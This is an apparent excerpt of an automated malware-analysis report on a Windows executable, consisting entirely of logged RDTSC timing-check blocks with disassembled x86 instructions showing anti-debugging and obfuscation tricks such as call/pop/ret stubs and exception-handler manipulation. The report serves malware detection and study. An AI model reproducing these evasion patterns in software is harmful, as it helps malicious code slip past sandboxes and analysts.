                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2789F second address: C278E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f mov ebx, dword ptr [ebp+122D2BD7h] 0x00000015 push 00000000h 0x00000017 jng 00007F1CC8B8C9ECh 0x0000001d adc ebx, 1A3DFF34h 0x00000023 mov edi, dword ptr [ebp+122D2C9Dh] 0x00000029 xchg eax, esi 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jng 00007F1CC8B8C9E6h 0x00000034 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C269CB second address: C26A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F1CC8BB7C48h 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007F1CC8BB7C38h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000016h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 push dword ptr fs:[00000000h] 0x0000002f jmp 00007F1CC8BB7C42h 0x00000034 mov dword ptr fs:[00000000h], esp 0x0000003b push 00000000h 0x0000003d push esi 0x0000003e call 00007F1CC8BB7C38h 0x00000043 pop esi 0x00000044 mov dword ptr [esp+04h], esi 0x00000048 add dword ptr [esp+04h], 0000001Bh 0x00000050 inc esi 0x00000051 push esi 0x00000052 ret 0x00000053 pop esi 0x00000054 ret 0x00000055 clc 0x00000056 sub edi, dword ptr [ebp+1244D89Eh] 0x0000005c mov eax, dword ptr [ebp+122D12F9h] 0x00000062 mov dword ptr [ebp+124723E8h], ebx 0x00000068 push FFFFFFFFh 0x0000006a mov ebx, ecx 0x0000006c nop 0x0000006d jmp 00007F1CC8BB7C40h 0x00000072 push eax 0x00000073 pushad 0x00000074 pushad 0x00000075 pushad 0x00000076 popad 0x00000077 push eax 0x00000078 push edx 0x00000079 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C278E6 second address: C278F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C278F5 second address: C2790C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8BB7C3Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2790C second address: C27910 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C27910 second address: C27914 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2996F second address: C29973 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C29973 second address: C29985 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C29985 second address: C29989 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C29989 second address: C2998F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2A90B second address: C2A90F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2A90F second address: C2A919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C29C0D second address: C29C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2A919 second address: C2A98E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F1CC8BB7C38h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D2F4Ch], edx 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push eax 0x00000031 call 00007F1CC8BB7C38h 0x00000036 pop eax 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b add dword ptr [esp+04h], 0000001Ch 0x00000043 inc eax 0x00000044 push eax 0x00000045 ret 0x00000046 pop eax 0x00000047 ret 0x00000048 mov bx, 8922h 0x0000004c xchg eax, esi 0x0000004d push eax 0x0000004e push edx 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F1CC8BB7C47h 0x00000056 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C29C11 second address: C29C34 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1CC8B8C9F5h 0x00000013 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2A98E second address: C2A994 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C29C34 second address: C29C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2A994 second address: C2A9A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2B87F second address: C2B8FD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jne 00007F1CC8B8C9F0h 0x00000010 nop 0x00000011 cmc 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F1CC8B8C9E8h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000016h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D2B37h] 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push ebx 0x00000039 call 00007F1CC8B8C9E8h 0x0000003e pop ebx 0x0000003f mov dword ptr [esp+04h], ebx 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc ebx 0x0000004c push ebx 0x0000004d ret 0x0000004e pop ebx 0x0000004f ret 0x00000050 push eax 0x00000051 pushad 0x00000052 push eax 0x00000053 push edx 0x00000054 js 00007F1CC8B8C9E6h 0x0000005a rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2C9A0 second address: C2CA2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1CC8BB7C42h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e mov dword ptr [ebp+122D3A42h], esi 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F1CC8BB7C38h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 0000001Ch 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 and ebx, 6F7B1297h 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push edx 0x0000003b call 00007F1CC8BB7C38h 0x00000040 pop edx 0x00000041 mov dword ptr [esp+04h], edx 0x00000045 add dword ptr [esp+04h], 0000001Bh 0x0000004d inc edx 0x0000004e push edx 0x0000004f ret 0x00000050 pop edx 0x00000051 ret 0x00000052 jmp 00007F1CC8BB7C3Fh 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a je 00007F1CC8BB7C38h 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2CA2C second address: C2CA32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                  Source: C:\Users\user\Desktop\Jl5yg1Km2s.exeRDTSC instruction interceptor: First address: C2CA32 second address: C2CA36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2D9C4 second address: C2DA2D instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1CC8B8C9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov di, 44ACh 0x00000012 push 00000000h 0x00000014 jmp 00007F1CC8B8C9EAh 0x00000019 pushad 0x0000001a mov ebx, dword ptr [ebp+122D29F7h] 0x00000020 add esi, dword ptr [ebp+122D1A67h] 0x00000026 popad 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push ebx 0x0000002c call 00007F1CC8B8C9E8h 0x00000031 pop ebx 0x00000032 mov dword ptr [esp+04h], ebx 0x00000036 add dword ptr [esp+04h], 0000001Ch 0x0000003e inc ebx 0x0000003f push ebx 0x00000040 ret 0x00000041 pop ebx 0x00000042 ret 0x00000043 jno 00007F1CC8B8C9ECh 0x00000049 push eax 0x0000004a jbe 00007F1CC8B8C9F4h 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 popad 0x00000054 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2E90D second address: C2E990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jns 00007F1CC8BB7C44h 0x0000000b popad 0x0000000c push eax 0x0000000d push ebx 0x0000000e push esi 0x0000000f jmp 00007F1CC8BB7C3Eh 0x00000014 pop esi 0x00000015 pop ebx 0x00000016 nop 0x00000017 jmp 00007F1CC8BB7C40h 0x0000001c movzx ebx, di 0x0000001f push 00000000h 0x00000021 jmp 00007F1CC8BB7C3Ah 0x00000026 push 00000000h 0x00000028 push 00000000h 0x0000002a push esi 0x0000002b call 00007F1CC8BB7C38h 0x00000030 pop esi 0x00000031 mov dword ptr [esp+04h], esi 0x00000035 add dword ptr [esp+04h], 00000015h 0x0000003d inc esi 0x0000003e push esi 0x0000003f ret 0x00000040 pop esi 0x00000041 ret 0x00000042 or dword ptr [ebp+122D20A5h], eax 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c jg 00007F1CC8BB7C36h 0x00000052 jo 00007F1CC8BB7C36h 0x00000058 popad 0x00000059 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2E990 second address: C2E9A6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a jc 00007F1CC8B8C9E8h 0x00000010 push eax 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2DB72 second address: C2DB78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2DB78 second address: C2DB7C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2DB7C second address: C2DC26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F1CC8BB7C3Ch 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F1CC8BB7C38h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 mov edi, 085D56DBh 0x0000002e push dword ptr fs:[00000000h] 0x00000035 jns 00007F1CC8BB7C38h 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov edi, dword ptr [ebp+122D28DFh] 0x00000048 mov eax, dword ptr [ebp+122D0895h] 0x0000004e push 00000000h 0x00000050 push eax 0x00000051 call 00007F1CC8BB7C38h 0x00000056 pop eax 0x00000057 mov dword ptr [esp+04h], eax 0x0000005b add dword ptr [esp+04h], 00000016h 0x00000063 inc eax 0x00000064 push eax 0x00000065 ret 0x00000066 pop eax 0x00000067 ret 0x00000068 or di, C547h 0x0000006d push FFFFFFFFh 0x0000006f jg 00007F1CC8BB7C41h 0x00000075 jmp 00007F1CC8BB7C3Bh 0x0000007a push eax 0x0000007b pushad 0x0000007c jmp 00007F1CC8BB7C43h 0x00000081 push esi 0x00000082 push eax 0x00000083 push edx 0x00000084 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C30AE9 second address: C30B7C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F1CC8B8C9F0h 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F1CC8B8C9F5h 0x00000016 jne 00007F1CC8B8C9F8h 0x0000001c popad 0x0000001d nop 0x0000001e push 00000000h 0x00000020 push ebp 0x00000021 call 00007F1CC8B8C9E8h 0x00000026 pop ebp 0x00000027 mov dword ptr [esp+04h], ebp 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc ebp 0x00000034 push ebp 0x00000035 ret 0x00000036 pop ebp 0x00000037 ret 0x00000038 mov ebx, dword ptr [ebp+122D18B2h] 0x0000003e push 00000000h 0x00000040 push eax 0x00000041 push edi 0x00000042 pop edi 0x00000043 pop edi 0x00000044 push 00000000h 0x00000046 add dword ptr [ebp+122D1F25h], esi 0x0000004c push eax 0x0000004d js 00007F1CC8B8C9F0h 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2FB5F second address: C2FB63 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C2FB63 second address: C2FB69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C30D3D second address: C30D47 instructions: 0x00000000 rdtsc 0x00000002 js 00007F1CC8BB7C3Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C32AEE second address: C32B85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 jng 00007F1CC8B8C9F2h 0x0000000d jns 00007F1CC8B8C9ECh 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push edi 0x00000017 call 00007F1CC8B8C9E8h 0x0000001c pop edi 0x0000001d mov dword ptr [esp+04h], edi 0x00000021 add dword ptr [esp+04h], 0000001Ch 0x00000029 inc edi 0x0000002a push edi 0x0000002b ret 0x0000002c pop edi 0x0000002d ret 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push eax 0x00000033 call 00007F1CC8B8C9E8h 0x00000038 pop eax 0x00000039 mov dword ptr [esp+04h], eax 0x0000003d add dword ptr [esp+04h], 0000001Dh 0x00000045 inc eax 0x00000046 push eax 0x00000047 ret 0x00000048 pop eax 0x00000049 ret 0x0000004a jg 00007F1CC8B8C9ECh 0x00000050 stc 0x00000051 sub dword ptr [ebp+122D1E8Bh], eax 0x00000057 push 00000000h 0x00000059 mov edi, dword ptr [ebp+122D3A42h] 0x0000005f xchg eax, esi 0x00000060 pushad 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F1CC8B8C9F3h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C32B85 second address: C32BCB instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jmp 00007F1CC8BB7C48h 0x00000010 jmp 00007F1CC8BB7C41h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b jmp 00007F1CC8BB7C3Bh 0x00000020 pop esi 0x00000021 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C34B76 second address: C34B7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C34B7A second address: C34BA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F1CC8BB7C46h 0x0000000d push ebx 0x0000000e pushad 0x0000000f popad 0x00000010 pop ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C34BA0 second address: C34BAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F1CC8B8C9E6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C34BAA second address: C34BD1 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c jo 00007F1CC8BB7C38h 0x00000012 pushad 0x00000013 popad 0x00000014 jg 00007F1CC8BB7C3Eh 0x0000001a pushad 0x0000001b push ecx 0x0000001c pop ecx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C32DB3 second address: C32DB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C34BD1 second address: C34BD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C3BC03 second address: C3BC0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C469EA second address: C469EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C469EE second address: C46A02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8B8C9EEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C46B79 second address: C46B92 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1CC8BB7C3Fh 0x00000009 jl 00007F1CC8BB7C36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4712A second address: C4714D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1CC8B8C9F9h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C4A76D second address: C4A788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1CC8BB7C42h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1F680 second address: C1F685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1F685 second address: C1F6E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F1CC8BB7C38h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 00000019h 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 lea eax, dword ptr [ebp+124843F7h] 0x0000002c push 00000000h 0x0000002e push esi 0x0000002f call 00007F1CC8BB7C38h 0x00000034 pop esi 0x00000035 mov dword ptr [esp+04h], esi 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc esi 0x00000042 push esi 0x00000043 ret 0x00000044 pop esi 0x00000045 ret 0x00000046 nop 0x00000047 push eax 0x00000048 push edx 0x00000049 push ecx 0x0000004a js 00007F1CC8BB7C36h 0x00000050 pop ecx 0x00000051 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1F6E8 second address: C1F6F6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1F6F6 second address: C1F704 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F1CC8BB7C36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1FCCB second address: C1FCD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1FCD1 second address: A6EB20 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov cl, ah 0x0000000d push dword ptr [ebp+122D1585h] 0x00000013 mov edx, 23EF1354h 0x00000018 call dword ptr [ebp+122D1BDCh] 0x0000001e pushad 0x0000001f jc 00007F1CC8BB7C37h 0x00000025 clc 0x00000026 xor eax, eax 0x00000028 cmc 0x00000029 mov edx, dword ptr [esp+28h] 0x0000002d sub dword ptr [ebp+122D1E72h], edx 0x00000033 mov dword ptr [ebp+122D2B3Bh], eax 0x00000039 mov dword ptr [ebp+122D1E72h], edx 0x0000003f mov dword ptr [ebp+122D2EACh], ebx 0x00000045 mov esi, 0000003Ch 0x0000004a jmp 00007F1CC8BB7C49h 0x0000004f add esi, dword ptr [esp+24h] 0x00000053 jmp 00007F1CC8BB7C44h 0x00000058 stc 0x00000059 lodsw 0x0000005b mov dword ptr [ebp+122D2EACh], edi 0x00000061 sub dword ptr [ebp+122D1E72h], ecx 0x00000067 add eax, dword ptr [esp+24h] 0x0000006b jl 00007F1CC8BB7C37h 0x00000071 clc 0x00000072 mov ebx, dword ptr [esp+24h] 0x00000076 clc 0x00000077 jp 00007F1CC8BB7C3Ch 0x0000007d mov dword ptr [ebp+122D2E13h], edx 0x00000083 nop 0x00000084 push eax 0x00000085 push edx 0x00000086 push edx 0x00000087 pushad 0x00000088 popad 0x00000089 pop edx 0x0000008a rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1FD6D second address: C1FDDD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F1CC8B8C9E6h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jne 00007F1CC8B8C9EEh 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jne 00007F1CC8B8C9F2h 0x0000001d mov eax, dword ptr [eax] 0x0000001f pushad 0x00000020 pushad 0x00000021 je 00007F1CC8B8C9E6h 0x00000027 jnp 00007F1CC8B8C9E6h 0x0000002d popad 0x0000002e jbe 00007F1CC8B8C9E8h 0x00000034 pushad 0x00000035 popad 0x00000036 popad 0x00000037 mov dword ptr [esp+04h], eax 0x0000003b jmp 00007F1CC8B8C9F0h 0x00000040 pop eax 0x00000041 or dword ptr [ebp+122D201Ch], eax 0x00000047 push 619CFFC9h 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f push esi 0x00000050 pop esi 0x00000051 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1FDDD second address: C1FDE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Jl5yg1Km2s.exe RDTSC instruction interceptor: First address: C1FDE1 second address: C1FDEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
